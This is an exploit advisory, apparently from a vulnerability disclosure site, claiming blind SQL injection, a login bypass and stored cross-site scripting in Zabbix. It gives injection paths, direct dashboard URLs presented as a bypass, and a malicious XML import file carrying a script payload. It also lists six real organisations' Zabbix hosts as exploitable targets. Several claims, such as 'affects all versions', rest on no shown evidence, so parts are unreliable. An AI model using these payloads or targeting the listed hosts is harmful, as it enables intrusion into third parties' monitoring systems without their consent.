Zabbix 5.x SQL Injection / Cross Site Scripting

2021.07.26
Credit: Taurus Omar
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
CWE-79

# Exploit Title: Zabbix all version / Multiple Vulnerabilities # Exploit Author: TaurusOmar # Twitter:@TaurusOmar # HomePage:taurusomar.com # Date: Jul 23th, 2021 # CVSS: 3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L # Version: Zabbix [1.x, 2.x, 3.x, 4,x 5.x] # Risk: High (9.0) # Vendor Homepage: https://www.zabbix.com/ # Tested on: Arch Linux # Greetz: PwnEc # Software Description: Zabbix is the ultimate enterprise-level software designed for real-time monitoring of millions of metrics collected from tens of thousands of servers, virtual machines and network devices. With encryption support it is possible to secure communications between separate Zabbix components (such as Zabbix server, proxies, agents and command-line utilities) using Transport Layer Security (TLS) protocol v.1.2. Certificate-based and pre-shared key-based encryption is supported. Encryption is optional and configurable for individual components. # 1.) Vulnerability Description => Blind Sqli (affect all versions): An error in the application allows executing sql statements blindly Path: https://domain/zabbix/hostinventoriesoverview.php?sid=[RANDOM_TOKEN]+Blind_Sqli&form_refresh=1&groupid=0&groupby=alias # 2.) Vulnerability Description => Bypass login (affect all versions): An error in the security of the form allows the login page to be skipped directly to the administration panel, which allows an attacker to access the entire application, managing to make queries, edit parameters, among others. Path: http://domain/zabbix/index.php Vulnerable Form: <form method="post" action="index.php" accept-charset="utf-8" aria-label="Sign in"> <ul> <li><label for="name">Username</label><input type="text" id="name" name="name" value="" maxlength="255" autofocus="autofocus"></li> <li><label for="password">Password</label><input type="password" id="password" name="password" value="" maxlength="255"></li> <li><input type="checkbox" id="autologin" name="autologin" value="1" class="checkbox-radio" checked="checked"><label for="autologin"><span></span>Remember me for 30 days</label></li> <li><button type="submit" id="enter" name="enter" value="Sign in">Sign in</button></li> <li class="sign-in-txt">or <a href="index.php?enter=guest">sign in as guest</a></li> </ul> </form> Pocs Bypass login - access dashborad: http://domain/zabbix/zabbix.php?action=dashboard.list http://doamin/zabbix/zabbix.php?action=problem.view&ddreset=1 http://doamin/zabbix/overview.php?ddreset=1 http://doamin/zabbix/hostinventoriesoverview.php?ddreset=1 http://doamin/zabbix/screenconf.php # 3.) Vulnerability Description => Stored Cross Site Scripting (affect all versions): The application allows uploading an xml file which can be modified by the <name> parameter with a load util XSS Path: https://domain//zabbix/screen.import.php?rules_preset=screen Malicious File .xml <?xml version="1.0" encoding="UTF-8"?> <zabbix_export> <version>3.4</version> <date>2021-07-23T20:55:48Z</date> <screens> <screen> <name>a‛%3E%3Cscript%3Ealert(‚123‛)%3C/script%3E</name> <hsize>1</hsize> <vsize>2</vsize> <screen_items> <screen_item> <resourcetype>7</resourcetype> <width>500</width> <height>100</height> <x>0</x> <y>0</y> <colspan>1</colspan> <rowspan>1</rowspan> <elements>0</elements> <valign>0</valign> <halign>0</halign> <style>0</style> <url/> <dynamic>0</dynamic> <sort_triggers>0</sort_triggers> <resource>0</resource> <max_columns>3</max_columns> <application/> </screen_item> </screen_items> </screen> </screens> </zabbix_export> # 4.) Samples web Vulnerabilities whit diferent version: https://monitoreouio.cntcloud.com/zabbix/[bypasslogin][blind_sqli][Stored_Xss] https://monitoreogye.cntcloud.com/zabbix/[bypasslogin][blind_sqli][Stored_Xss] https://zabbix.iwinds.com.ar/zabbix/[bypasslogin][blind_sqli][Stored_Xss] https://www.cse.iitb.ac.in/soumen-pc/zabbix/[bypasslogin][blind_sqli][Stored_Xss] http://monitor.esprida.com/zabbix/[bypasslogin][blind_sqli][Stored_Xss] http://demo-zabbix.racom.eu/zabbix/[bypasslogin][blind_sqli][Stored_Xss] ####### # # Disclaimer: # This or previous programs are for Educational purpose ONLY. Do not use it without permission. # The usual disclaimer applies, especially the fact that Taurus Omar is not liable for any damages # caused by direct or indirect use of the information or functionality provided by these programs. # The author or any Internet provider bears NO responsibility for content or misuse of these programs # or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss, # system crash, system compromise, etc.) caused by the use of these programs are not Taurus Omar's # responsibility. # #######


Vote for this issue:
0%
100%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top